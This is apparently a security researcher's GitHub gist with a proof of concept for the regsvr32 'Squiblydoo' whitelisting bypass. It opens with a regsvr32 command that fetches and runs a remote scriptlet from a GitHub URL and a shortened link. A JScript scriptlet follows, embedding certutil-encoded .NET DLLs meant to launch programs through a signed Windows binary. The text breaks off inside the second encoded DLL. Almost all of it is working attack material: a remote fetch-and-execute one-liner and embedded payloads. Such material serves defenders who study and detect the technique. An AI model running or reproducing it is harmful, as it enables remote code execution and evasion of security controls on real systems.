@subTee /command.txt Secret
Last active Dec 26, 2016

JS Delivery via SCT
regsvr32.exe /s /n /u /i:https://gist.githubusercontent.com/subTee/3610a16a54bcbc1fe0ebc46313f5c02e/raw/d07ff7974c09e5b9395ffcc71b49c8d12351db1c/jsdelivery.sct scrobj.dll
[OR]
regsvr32.exe /s /u /i:https://goo.gl/L4brce scrobj.dll
;-)
Tested on Windows 10; requires .NET Framework 4.5.2.
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
// I/O mode values passed as the second argument of FileSystemObject.OpenTextFile
// by the file helpers in this scriptlet: 1 opens for reading, 2 opens for writing.
var fsoForReading = 1;
var fsoForWriting = 2;
// Reference MSDN https://msdn.microsoft.com/en-us/library/aa265347(v=vs.60).aspx
function sleep(delay)
{
    // Blocking wait: spins on the wall clock until `delay` milliseconds have
    // elapsed. There is no yield, so the hosting process stays busy on one core
    // for the whole interval.
    var deadline = new Date().getTime() + delay;
    while (new Date().getTime() < deadline)
    {
        // intentionally empty - polling the clock is the whole loop
    }
}
function LoadStringFromFile(filename)
{
    // Returns the whole content of `filename` as a single string, read through
    // the Scripting.FileSystemObject COM object.
    // Not called anywhere in the visible scriptlet.
    var fileSystem = new ActiveXObject("Scripting.FileSystemObject");
    // The third argument (true) asks OpenTextFile to create the file if it is missing.
    var stream = fileSystem.OpenTextFile(filename, fsoForReading, true);
    var contents = stream.ReadAll();
    stream.Close();
    return contents;
}
function SaveStringToFile(filename, textString)
{
    // Writes `textString` to `filename` through the Scripting.FileSystemObject
    // COM object, opening the file for writing and creating it when absent
    // (third argument true). The path is used exactly as given, so a relative
    // name resolves against the hosting process's current directory.
    var fileSystem = new ActiveXObject("Scripting.FileSystemObject");
    var stream = fileSystem.OpenTextFile(filename, fsoForWriting, true);
    stream.Write(textString);
    stream.Close();
}
// Example File Prep
// Output of 'certutil.exe /encode AllTheThingsx64.dll AllTheThingsx64.txt'
// Why bother writing a terrible Base64 encode/decode routine, when certutil.exe will do it for you?
//
var x86dllEncoded = "-----BEGIN CERTIFICATE-----\
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v\
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAOHMhlcAAAAA\
AAAAAOAAAiELAQsAABAAAAAIAAAAAAAAri8AAAAgAAAAQAAAAAAAEAAgAAAAAgAA\
BAAAAAAAAAAEAAAAAAAAAACgAAAABAAA4lMAAAMAQIUAABAAABAAAAAAEAAAEAAA\
AAAAABAAAAAQQAAAKAAAAFwvAABPAAAAAGAAAJgDAAAAAAAAAAAAAAAAAAAAAAAA\
AIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA\
tA8AAAAgAAAAEAAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2RhdGEAALUAAAAAQAAA\
AAIAAAAUAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAACYAwAAAGAAAAAEAAAAFgAA\
AAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAFAAAAACAAAAAAgAAABoAAAAAAAAAAAAA\
AAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAJAvAAAAAAAASAAAAAIABQCkIQAAcA0AAAoAAAAAAAAA\
AAAAAAAAAABQIAAAgAAAAAAAAAAAAAAAVC8AAAgAAAAAAAAAAAAAAAAAAAAAAAAA\
hIHoDzXS4EVt+OmRj4KK22zFVcxh8Z1crHcneIMoVmI11LDX84GEziV5BMQfeojp\
dugMDMrx7G2nUlsVQF6HMm961gFcNSrMcWokfoifYBZXqsXoUkE4fOqEMyqH4xol\
nZnusiIxOIjDDOokb20LnrrfWncFOXsHUnTWPEtTUzwucgEAAHAoEAAACioeAigR\
AAAKKl5zEgAACiVyTQAAcG8TAAAKKBQAAAomKh4CKBEAAAoqQnJfAABwKBAAAAoo\
AwAABioeAigWAAAKKkYCKBoAAApylQAAcCgQAAAKKkJyxQAAcCgQAAAKKAMAAAYq\
QnL7AABwKBAAAAooAwAABioaKAMAAAYqGigDAAAGKhooAwAABioaKAMAAAYqGigD\
AAAGKh4CKBEAAAoqOgIoEQAACgIWfQEAAAQqWnJBAQBwAnsBAAAEjCEAAAEoHQAA\
CioAAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAEQEAAAjfgAA\
sAQAAOwEAAAjU3RyaW5ncwAAAACcCQAAYAEAACNVUwD8CgAAEAAAACNHVUlEAAAA\
DAsAAGQCAAAjQmxvYgAAAAAAAAACAAABVxUAAAkAAAAA+iUzABYAAAEAAAAiAAAA\
BwAAAAEAAAARAAAABwAAAB0AAAAZAAAAAQAAAAQAAAAAAN0DAQAAAAAABgAqAAoA\
BgBQAAoACgCIAG4ACgCnAG4ACgC4AG4ABgDsANoABgADAdoABgAgAdoABgA/AdoA\
BgBYAdoABgBxAdoABgCMAdoABgDGAacBBgDaAacBBgDoAdoABgAfAgUCBgA/AjgC\
BgBGAjgCDgBrAlgCDgCJAlgCEgC0ApcCDgDUAr4CBgD9AuoCCgAJA24ABgAbA6cB\
BgAzA6cBBgBGA6cBCgBWA24ACgBrA24ABgB9A6cBBgCaA6cBBgC5AwoABgDJAzgC\
BgDPAzgCAAAAAAEAAAAAAAEAAQABABAA9wMAAEUAAQABAAEAEAD/AwAARQABAAMA\
AQAQAAYEAABVAAEABQABABAADQQAAGEAAQAHAAAAEAAUBAAARQABAAsAAQAQABwE\
IgRFAAEAEAAGAM0E1ADQIAAAAACWACkEswABANwgAAAAAIYYSgAGAAEA5CAAAAAA\
lgAuBLMAAQD8IAAAAACGGEoABgABAAQhAAAAAMYAMwS3AAEAFSEAAAAAhhhKAAYA\
AgAdIQAAAACGGEoABgACAC8hAAAAAJYASAQaAAIAQCEAAAAAlgBaBBoAAwBRIQAA\
AACGAC4EBgAEAFghAAAAAJYAagTCAAQAXyEAAAAAlgCVBM0ACABmIQAAAACWAKcE\
zQAIAG0hAAAAAJYAuwTNAAgAdCEAAAAAhhhKAAYACAB8IQAAAACGGEoABgAIAIsh\
AAAAAIYA0QTXAAgAAAABAD0EAAABAFYEAAABAFYEAAABAHUEAAACAHoEAAADAIAE\
AAAEAIwECQBKAAEAEQBKAAYAGQBKAAoAKQBKABAAMQBKABUAOQBKABUAQQBKABUA\
SQBKABUAUQBKABUAWQBKABUAYQBKABUAaQBKABAAcQBKABUAeQBKABUAgQBKABUA\
kQBOAhoAiQBKAAYAmQBKAAYAmQB8AhUAoQCRAh8AsQBKABAAqQBKAAYAyQBKACYA\
2QBKABUA4QBKACwAwQBKAAYA8QBKAAYA+QBKAAYAEQHWAzIALgAbAKUBLgB7ABUC\
LgALAH0BLgATAIYBLgAjAK4BLgArALQBLgAzAK4BLgA7AK4BLgBDAK4BLgBLALQB\
LgBTAMYBLgBbAK4BLgBjAK4BLgBrAN4BLgBzAAgCgwCrAEoAowC7AHoAowDLAJgA\
owBrAFAAowBjAEoAowDDAIMA4wDDAKEA4wBjAEoAAAHbAL0AIAHjAL0ABIAAAAEA\
AAAAAAAAAQAAANsA3AQAAAQAAAAAAAAAAAAAADgA7gMAAAAABAAAAAAAAAAAAAAA\
QQBuAAAAAAAEAAAAAAAAAAAAAAA4ADgCAAAAAAQAAAAAAAAAAAAAAEEAlwIAAAAA\
AAAAAAA8TW9kdWxlPgBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAENv\
bXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUALmN0b3IAUnVudGltZUNvbXBh\
dGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLkVudGVycHJpc2VTZXJ2aWNlcwBBcHBs\
aWNhdGlvbkFjdGl2YXRpb25BdHRyaWJ1dGUAQWN0aXZhdGlvbk9wdGlvbgBBcHBs\
aWNhdGlvbkFjY2Vzc0NvbnRyb2xBdHRyaWJ1dGUAU3lzdGVtLlJlZmxlY3Rpb24A\
QXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmli\
dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbXBh\
bnlBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29w\
eXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFN5c3Rl\
bS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBDb21WaXNpYmxlQXR0cmlidXRlAEd1\
aWRBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTeXN0ZW0u\
UnVudGltZS5WZXJzaW9uaW5nAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBTeXN0\
ZW0AT2JqZWN0AENvbnNvbGUAV3JpdGVMaW5lAFN5c3RlbS5EaWFnbm9zdGljcwBQ\
cm9jZXNzU3RhcnRJbmZvAHNldF9GaWxlTmFtZQBQcm9jZXNzAFN0YXJ0AFN5c3Rl\
bS5Db25maWd1cmF0aW9uLkluc3RhbGwASW5zdGFsbGVyAFN5c3RlbS5Db21wb25l\
bnRNb2RlbABSdW5JbnN0YWxsZXJBdHRyaWJ1dGUAU3lzdGVtLkNvbGxlY3Rpb25z\
AElEaWN0aW9uYXJ5AFNlcnZpY2VkQ29tcG9uZW50AENsYXNzSW50ZXJmYWNlQXR0\
cmlidXRlAENsYXNzSW50ZXJmYWNlVHlwZQBQcm9nSWRBdHRyaWJ1dGUAVHJhbnNh\
Y3Rpb25BdHRyaWJ1dGUAVHJhbnNhY3Rpb25PcHRpb24AQ29tUmVnaXN0ZXJGdW5j\
dGlvbkF0dHJpYnV0ZQBDb21VbnJlZ2lzdGVyRnVuY3Rpb25BdHRyaWJ1dGUAQ2Fs\
bENvbnZTdGRjYWxsAEludDMyAFN0cmluZwBGb3JtYXQAQWxsVGhlVGhpbmdzLmRs\
bABtc2NvcmxpYgBQcm9ncmFtAFRoaW5nMABUaGluZzEAQnlwYXNzAEV4cG9ydHMA\
VGhpbmcAc3ViVGVlAE1haW4ARXhlYwBVbmluc3RhbGwAc2F2ZWRTdGF0ZQBSZWdp\
c3RlckNsYXNzAGtleQBVblJlZ2lzdGVyQ2xhc3MARW50cnlQb2ludABod25kAGhp\
bnN0AGxwc3pDbWRMaW5lAG5DbWRTaG93AERsbFJlZ2lzdGVyU2VydmVyAERsbFVu\
cmVnaXN0ZXJTZXJ2ZXIARGxsR2V0Q2xhc3NPYmplY3QATnVtAEdldE1lc3NhZ2UA\
QWxsVGhlVGhpbmdzAAAAAABLSABlAGwAbABvACAARgByAG8AbQAgAE0AYQBpAG4A\
LgAuAC4ASQAgAEQAbwBuACcAdAAgAEQAbwAgAEEAbgB5AHQAaABpAG4AZwABEWMA\
YQBsAGMALgBlAHgAZQAANUgAZQBsAGwAbwAgAFQAaABlAHIAZQAgAEYAcgBvAG0A\
IABVAG4AaQBuAHMAdABhAGwAbAAAL0kAIABhAG0AIABhACAAYgBhAHMAaQBjACAA\
QwBPAE0AIABPAGIAagBlAGMAdAAANUkAIABzAGgAbwB1AGwAZABuACcAdAAgAHIA\
ZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQABRUkAIABzAGgAbwB1AGwAZABuACcA\
dAAgAHIAZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQAgAGUAaQB0AGgAZQByAC4A\
AR1OAHUAbQBiAGUAcgAgAGkAcwAgAHsAMAB9AC4AAAAJ8Vav4FuUQL1vc2zseC4f\
AAQgAQEIAyAAAQUgAQEREQQgAQECBCABAQ4EAAEBDgYAARJREk0FIAEBEWkFIAEB\
EXUFAAIODhwIt3pcVhk04IkIsD9ffxHVCjoFAQABAAApAQAkMzFEMkI5NjktNzYw\
OC00MjZFLTlEOEUtQTA5RkM5QTUxNjgwAAAIAQAAAAAAAAAUAQAPZGxsZ3Vlc3Qu\
QnlwYXNzAAAIAQADAAAAAAARAQAMc3VidGVlLlRoaW5nAAADAAABBSABARJdBAEA\
AAAKAAQggIEBGBgOCAYAACCAgQECBggDIAAOgKAAJAAABIAAAJQAAAAGAgAAACQA\
AFJTQTEABAAAAQABAAtBHWB3pyShpMmhh27dNvN38y6duzRQR/TmciyPJ/h+88d8\
BKkPZiL05SqFUOiem1RA1clLPfQDGGkN6RW9A/Ox3ZRd3Wq4fbyuaEKH0wj1jvR6\
NuTVSrVWdrM6PVDUpk9il+KRtY2aI/wshNozZdDlMONgVSgn/gvEND9mrNizCAEA\
CAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAEAAAAAAAUB\
AAAAABEBAAxBbGxUaGVUaGluZ3MAABcBABJDb3B5cmlnaHQgwqkgIDIwMTYAACkB\
ACQwNTQ3ZmY0MC01MjU1LTQyYTItYmViNy0yZmYwZGJmN2QzYmEAAAwBAAcxLjAu\
MC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3\
b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjIAAAAAAAAAAAAAAP8l\
AEAAEAAAAAAAAAAAAAD/JQRAABAAAAAAAAAAAAAA/yUIQAAQAAAAAAAAAAAAAP8l\
DEAAEABAAAAEAAUAhC8AAAAAAAAAAAAAni8AAAAgAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAJAvAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8l\
ACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAGDAAABg0AAAYOAAAG\
AAAAAOHMhlcAAAAAo0AAAAAAAAAEAAAABAAAADhAAABIQAAAWEAAAB4vAAAuLwAA\
Pi8AAE4vAABgQAAAckAAAIRAAACYQAAAAwABAAIAAABEbGxHZXRDbGFzc09iamVj\
dABEbGxSZWdpc3RlclNlcnZlcgBEbGxVbnJlZ2lzdGVyU2VydmVyAEVudHJ5UG9p\
bnQAXEFsbFRoZVRoaW5ncy5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA\
AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAAA8AwAA\
AAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA\
vQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAA\
AAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEA\
bgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAIAAAEAUwB0AHIAaQBuAGcARgBpAGwA\
ZQBJAG4AZgBvAAAAeAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0A\
bQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAA\
AAAAAEIADQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABBAGwA\
bABUAGgAZQBUAGgAaQBuAGcAcwAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkA\
bwBuAAAAAAAxAC4AMAAuADAALgAwAAAAQgARAAEASQBuAHQAZQByAG4AYQBsAE4A\
YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAABIABIA\
AQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA\
dAAgAKkAIAAgADIAMAAxADYAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0A\
YQByAGsAcwAAAAAAAAAAAEoAEQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4A\
YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAAA6AA0A\
AQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAbABsAFQAaABlAFQAaABpAG4A\
ZwBzAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4A\
MAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A\
bgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACA/MD9AP1A/\
sD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAA==\
-----END CERTIFICATE-----"
var x64dllEncoded = "-----BEGIN CERTIFICATE-----\
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v\
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYEALx/flcAAAAA\
AAAAAPAAIiALAgsAABAAAAAIAAAAAAAAni4AAAAgAAAAAACAAQAAAAAgAAAAAgAA\
BAAAAAAAAAAEAAAAAAAAAACgAAAABAAA3jMAAAMAQIUAAEAAAAAAAABAAAAAAAAA\
AAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAGEAAACgAAABILgAAUwAAAABgAACYAwAA\
AAAAAAAAAAAAAAAAAAAAAACAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAABAAAAAAAAAAAAAAABAgAABIAAAA\
AAAAAAAAAAAudGV4dAAAAKoOAAAAIAAAABAAAAAEAAAAAAAAAAAAAAAAAAAgAABg\
LnNkYXRhAAChAAAAAEAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAA\
mAMAAABgAAAABAAAABYAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAABAAAAAAgAAA\
AAIAAAAaAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAIAuAAAAAAAAAAAAAAAAAABIAAAAAgAFAIghAACQDAAA\
CAAAAAAAAAAAAAAAAAAAAGAgAACAAAAAAAAAAAAAAABALgAACAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAOhao1eKooGq53BL1Fbcu3p77QlcOUUVy/of55ks/6bI\
FLQyC2BriJt7OZg3IrSycnsaTdZypyTHYQcTY+CEChGhvOawFJc/zUHdTyRM8Ijj\
ceCAC86t3XzNum18Phy/AJFVevIeGQPdMoaJan0SJGkfPcXHZmnPS9ygFX/lkX8E\
LnIBAABwKBAAAAoqHgIoEQAACipecxIAAAolck0AAHBvEwAACigUAAAKJioeAigR\
AAAKKkJyXwAAcCgQAAAKKAMAAAYqHgIoFgAACipGAigaAAAKcpUAAHAoEAAACipC\
csUAAHAoEAAACigDAAAGKkJy+wAAcCgQAAAKKAMAAAYqGigDAAAGKhooAwAABioa\
KAMAAAYqGigDAAAGKh4CKBEAAAoqAAAAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAz\
MTkAAAAABQBsAAAA5AMAACN+AABQBAAAqAQAACNTdHJpbmdzAAAAAPgIAABEAQAA\
I1VTADwKAAAQAAAAI0dVSUQAAABMCgAARAIAACNCbG9iAAAAAAAAAAIAAAFHFQAA\
CQAAAAD6JTMAFgAAAQAAACAAAAAGAAAADgAAAAcAAAAcAAAAFwAAAAEAAAAEAAAA\
AADJAwEAAAAAAAYAKgAKAAYAUAAKAAoAiABuAAoApwBuAAoAuABuAAYA7ADaAAYA\
AwHaAAYAIAHaAAYAPwHaAAYAWAHaAAYAcQHaAAYAjAHaAAYAxgGnAQYA2gGnAQYA\
6AHaAAYAHwIFAgYAPwI4AgYARgI4Ag4AawJYAg4AiQJYAhIAtAKXAg4A1AK+AgYA\
/QLqAgoACQNuAAYAGwOnAQYAMwOnAQYARgOnAQoAVgNuAAoAawNuAAYAfQOnAQYA\
mgOnAQYAuQMKAAAAAAABAAAAAAABAAEAAQAQAOMDAABFAAEAAQABABAA6wMAAEUA\
AQADAAEAEADyAwAAVQABAAUAAQAQAPkDAABhAAEABwAAABAAAAQAAEUAAQALAOAg\
AAAAAJYACASbAAEA7CAAAAAAhhhKAAYAAQD0IAAAAACWAA0EmwABAAwhAAAAAIYY\
SgAGAAEAFCEAAAAAxgASBJ8AAQAlIQAAAACGGEoABgACAC0hAAAAAIYYSgAGAAIA\
PyEAAAAAlgAnBBoAAgBQIQAAAACWADkEGgADAGEhAAAAAIYADQQGAAQAaCEAAAAA\
lgBJBKoABABvIQAAAACWAHQEtQAIAHYhAAAAAJYAhgS1AAgAfSEAAAAAhhhKAAYA\
CAAAAAEAHAQAAAEANQQAAAEANQQAAAEAVAQAAAIAWQQAAAMAXwQAAAQAawQJAEoA\
AQARAEoABgAZAEoACgApAEoAEAAxAEoAFQA5AEoAFQBBAEoAFQBJAEoAFQBRAEoA\
FQBZAEoAFQBhAEoAFQBpAEoAEABxAEoAFQB5AEoAFQCBAEoAFQCRAE4CGgCJAEoA\
BgCZAEoABgCZAHwCFQChAJECHwCxAEoAEACpAEoABgDJAEoAJgDZAEoAFQDhAEoA\
LADBAEoABgDxAEoABgD5AEoABgAuACMAjwEuAHsA9gEuAAsAXgEuABMAZwEuABsA\
hgEuACsAlQEuADMAjwEuADsAjwEuAEMAjwEuAEsAlQEuAFMApwEuAFsAjwEuAGMA\
jwEuAGsAvwEuAHMA6QGDAKsARACjALsAdACjAMMAfQCjAGsASgCjAMsAkgCjAGMA\
RAAAAdsApQAgAeMApQAEgAAAAQAAAAAAAAABAAAAvACaBAAABAAAAAAAAAAAAAAA\
MgDaAwAAAAAEAAAAAAAAAAAAAAA7AG4AAAAAAAQAAAAAAAAAAAAAADIAOAIAAAAA\
BAAAAAAAAAAAAAAAOwCXAgAAAAAAAAAAADxNb2R1bGU+AFN5c3RlbS5SdW50aW1l\
LkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0\
ZQAuY3RvcgBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uRW50\
ZXJwcmlzZVNlcnZpY2VzAEFwcGxpY2F0aW9uQWN0aXZhdGlvbkF0dHJpYnV0ZQBB\
Y3RpdmF0aW9uT3B0aW9uAEFwcGxpY2F0aW9uQWNjZXNzQ29udHJvbEF0dHJpYnV0\
ZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2Vt\
Ymx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0\
cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RB\
dHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFk\
ZW1hcmtBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENv\
bVZpc2libGVBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJz\
aW9uQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVGFyZ2V0RnJh\
bWV3b3JrQXR0cmlidXRlAFN5c3RlbQBPYmplY3QAQ29uc29sZQBXcml0ZUxpbmUA\
U3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3NTdGFydEluZm8Ac2V0X0ZpbGVOYW1l\
AFByb2Nlc3MAU3RhcnQAU3lzdGVtLkNvbmZpZ3VyYXRpb24uSW5zdGFsbABJbnN0\
